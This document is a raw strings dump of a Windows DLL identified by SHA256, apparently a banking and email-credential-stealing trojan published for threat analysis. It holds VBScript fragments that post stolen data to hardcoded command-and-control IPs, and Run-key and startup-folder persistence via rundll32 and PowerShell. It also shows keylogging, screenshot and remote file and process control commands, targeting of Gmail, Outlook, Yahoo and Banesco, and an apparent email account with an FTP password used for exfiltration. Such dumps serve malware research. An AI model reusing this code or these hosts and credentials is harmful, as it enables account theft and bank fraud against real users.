_rcqwap_box.dll

1. Name: _rcqwap_box.dll
2. SHA256: F5E71B8BB52A21A0E4D23DD25FE43ECC7DCAADF9E4F84C7CA676BADF32173CD9
3.  
4. start.cfg
5. configz.zip
6. open
7. Uconfini.bat
8. Uconfini.txt
9. capivara.exe
10. 8192
11. 192.168.1.3
12. is-gmail
13. gmail
14. Email
15. <|>
16. MSScriptControl.ScriptControl
17. VBScript
18. host = "
19. port = "
20. cmd="
21. information="
22. set httpobj = createobject("msxml2.xmlhttp")
23. function post (cmd ,param)
24. on error resume next
25. post = param
26. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
27. httpobj.setrequestheader "user-agent:",information
28. httpobj.send param
29. post = httpobj.responsetext
30. end function
31. response = ""
32. response = post ("is-gmail","")
33. vai fechar
34. Off-line
35. is-testando
36. Passwd
37. usuario:
38. Senha:
39. c:\gmail.com.txt
40. [Click]
41. bckimg\BP\
42. foto
43. .jpg
44. c:\outlookUrl.txt
45. accounts/Logout
46. loginP.jsp
47. c:\img\gaiola10.txt
48. blacklist.cfg
49. is-outlista
50. lista.txt
51. lista extraida com sucesso!
52. AuthUser:
53. AuthUser: "
54. https://people.live.com/export?canary=
55. 200.98.145.213
56. is-outlook
57. outlook
58. response = post ("is-outlook","")
59. offline2
60. ok pessoal!
61. kkk
62. loginfmt
63. c:\outllok.com.txt
64. SP=
65. https://people.live.com/
66. login.live.com/logout.srf?
67. offline1
68. IB.cfg
69. Banesco Panam
70. bckimg\gmail\
71. env_gmail.zip
72. block_gmail.win
73. c:\img\links.txt
74. _gmail
75. .zip
76. dd_mm_yyyy
77. hh_mm_ss
78. _BP2.zip
79. /HOME/infos/bp/
80. bckimg
81. \gmail
82. bloqueado
83. Restore
84. minimizado
85. Chrome_RenderWidgetHostHWND
86. MozillaWindowClass
87. Chrome_WidgetWin_1
88. _bP
89. Google Chrome
90. Icon_gc
91. Icon_gc.ico
92. -------------------------------------
93. Browser :
94. URL :
95. Data/Hora :
96. trustee Instalado:
97. http://outlook.com/
98. https://accounts.google.com/AddSession?
99. sacu=1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
100. Internet Explorer
101. Internet Explorer_Server
102. https://accounts.google.com/AddSession
103. ?sacu=1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
104. Mozilla Firefox
105. https://accounts.google.com/AddSession?sacu=
106. 1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
107. bckimg\look\
108. foto_TEXTO_
109. dd-mm-yy-hh
110. .txt
111. foto_infopc.txt
112. env_look.zip
113. block_look.win
114. _look
115. \look
116. Iniciar sesi
117. Registrarse
118. Enter
119. Sign In
120. Entrar
121. IEFrame
122. Frame Tab
123. TabWindowClass
124. Shell DocObject View
125. _Yahoo.zip
126. /HOME/emails/Yahoo/
127. email\Yahoo\
128. _Yahoo
129. \Yahoo
130. Iniciar sesi
131. n en Yahoo
132. Sign in to Yahoo
133. Yahoo - Inicio de sesi
134. internetbanking.cfg
135. - Google Chrome
136. Icon_ie
137. Icon_ie.ico
138. - Internet Explorer
139. Icon_ff
140. Icon_ff.ico
141. - Mozilla Firefox
142. https://es.mail.yahoo.com/
143. email_TEXTO_
144. set fs = CreateObject("Scripting.FileSystemObject")
145. Set ts = fs.CreateTextFile("c:\bundadecachorro.txt", True, False)
146. ts.Write
147. ts.close
148. Scripting.Encoder
149. .vbs
150. set shellobj = createobject("wscript.shell")
151. startup = shellobj.specialfolders ("startup") & "\"
152. pcname = shellobj.expandenvironmentstrings("%computername%") & "_"
153. username = shellobj.expandenvironmentstrings("%username%")
154. startup
155. pcname
156. username
157. Set objShell = CreateObject("WScript.Shell")
158. set filesystemobj = createobject("scripting.filesystemobject")
159. rundll = "PowerShell Start-Process rundll32.exe " &
160. & chr(44) & "boxProc" & chr(34)
161. if filesystemobj.fileexists (
162. ) then
163. objShell.run(rundll),0
164. End If
165. _box.vbe
166. configs_pc.yxz
167. dd/mm/yyyy
168. True
169. connex.win
170. NEWPRINT
171. MOUSE
172. novoteclado
173. PASTE
174. BACKSPACE
175. TAB
176. VK_DOWN
177. VK_UP
178. VK_DELETE
179. VK_SPACE
180. VK_ESCAPE
181. <|Drivers|>
182. <<|Drivers|>>
183. <|FileManager|>
184. <<|FileManager|>>
185. TESTAPASTAS
186. TESTAFILES
187. <|DownloadFile|>
188. <<|
189. FAZDOWNLOAD
190. <|UploadFile|>
191. SUCESSOUPLOAD
192. ATIVARNAVEGADOR
193. NAVEGADORCLOSE
194. <|AbrirFile|>
195. <|DeleteFile|>
196. LISTARPROCESS
197. ABREPROCESS
198. frm_navprinc
199. FECHARPROCESS
200. ESCONDERROCESS
201. AJUSTARPROCESS
202. MAXIMIZARPROCESS
203. EXECUTARPROCESS
204. DOWNBOFISICA
205. bckimg\bo\
206. env_bo_fis.zip
207. Wscript.Shell
208. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
209. 1979
210. rundll32.exe shell32.dll,Control_RunDLL
211. REG_SZ
212. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
213. rundll32.exe "
214. ,dlgProc
215. GETPROCESS
216. PRINT
217. <|INFO|>
218. env_bo_emp.zip
219. env_bp.zip
220. ulogs_0015.cfg
221. http://bit.ly/1aOYgU7
222. Trusteer
223. <|BOFUPLOADFILE|>
224. 200.98.69.192
225. <|BOUPLOADFILE|>
226. <|BPUPLOADFILE|>
227. Mensagem da p
228. gina da web
229. Progman
230. .dll
231. 1234
232. pablo.bermudez.venez@hotmail.com
233. 12345.diablomarico
234. ftp.box.com
235. RapportService.exe
236. SIM
237. form1 :
238. Socket Error